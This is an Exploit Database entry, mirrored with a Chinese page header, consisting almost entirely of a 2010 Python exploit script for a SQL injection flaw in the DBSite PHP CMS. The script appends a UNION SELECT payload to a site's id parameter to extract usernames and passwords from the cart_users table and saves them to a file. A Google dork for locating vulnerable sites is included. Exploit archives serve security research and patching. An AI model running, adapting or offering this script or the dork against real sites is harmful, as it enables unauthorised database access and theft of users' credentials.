DBSite – SQL Injection

• Exploit Database
• 35 阅读

• 作者： God_Of_Pain
  日期： 2010-11-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15512/

• #!/usr/bin/env python
  # -*- coding: utf-8 -*-
  # --------------------------------------------------------
  # Exploit Title: DBSite Remote SQL Injection Vulnerability
  # Date: 13/10/2010
  # Author: God_Of_Pain
  # Version: 1.0
  # Tested on: Linux
  # --------------------------------------------------------
  # ========================================================
  # Greetz to: LordTittiS3000 && System_Overide
  # Example: http://www.site.it/index.php?id=[SQLi]
  # Dork: intext:"Powered by DBSite" inurl:index.php?id=
  # ========================================================
  
  import urllib2
  import sys
  import re
  import os
  import time
  import platform
  
  if platform.system() == "Linux":
  	os.system('clear')
  elif platform.system() == "Windows":
  	os.system('cls')
  
  try:
  	testo = """
  	*****************************************************************
  	*+----------------------------------------+ *
  	*| CMS DBSite SQL Injection Vulnerability | *
  	*+----------------------------------------+ *
  	*| Bug DiscoveredBy God_Of_Pain | *
  	*+----------------------------------------+ *
  	*|Exploit Coded By God_Of_Pain| *
  	*+----------------------------------------+ *
  	* ============================================================*
  	* +----------------------------------------------------------+*
  	* | Usage: Exploit.py <site> <id>|*
  	* +----------------------------------------------------------+*
  	* |python exploit.py <http://site.com/index.php?ID=> <10>|*
  	* +----------------------------------------------------------+*
  	*****************************************************************
  
  	"""
  	print(testo)
  	time.sleep(1)
  
  	target = sys.argv[1]
  	ID = sys.argv[2]
  	http = "http://"
  	sql = "+union+select+concat(0x3e3e3e,USERNAME,0x3a3a3a,PWD,0x3e3e3e),2,3+from+cart_users--"
  	newid = "-"
  	spa = " "
  
  	if http in target:
  		del(http)
  	sqli = target + newid + ID + sql
  	if spa in sqli:
  		del(spa)
  	print "Ok, Exploiting..."
  	print ""
  	time.sleep(1)
  	print "Please Wait..."
  	print ""
  	time.sleep(1)
  	try:
  		prov = urllib2.urlopen(sqli).read()
  		prov2 = re.findall(r">>>(.*)([0-9a-zA-Z])([^<>])(.*)>>>", prov)
  		if len(prov2) > 1:
  			print "+--------------+"
  			print "| Exploit Done |"
  			print "+--------------+"
  			print "User & Pwd => " + prov2[0][0] + prov2[0][1]
  			time.sleep(1)
  			print ""
  			print "Saving User && PWD in a .txt file..."
  			print ""
  			o = open("User&&PwdDBSiteExploit.txt", "w")
  			o.write(prov2[0][0] + prov2[0][1])
  			o.close()
  			print "Saved!"
  			print ""
  			print "Thanks for using this Exploit!"
  		else:
  			print "+----------------------+"
  			print "|Exploit Failed|"
  			print "+----------------------+"
  			print "|I'm so sorry :( |"
  			print "+----------------------+"
  	except urllib2.HTTPError:
  		print "Sorry! Exploit Failed! There is an error :("
  except IndexError:
  	print "-* Good Luck! *-"
  
  # The End! :)
  # -------------------------------------
  # http://oversecuritycrew.webnet32.com/
  # -------------------------------------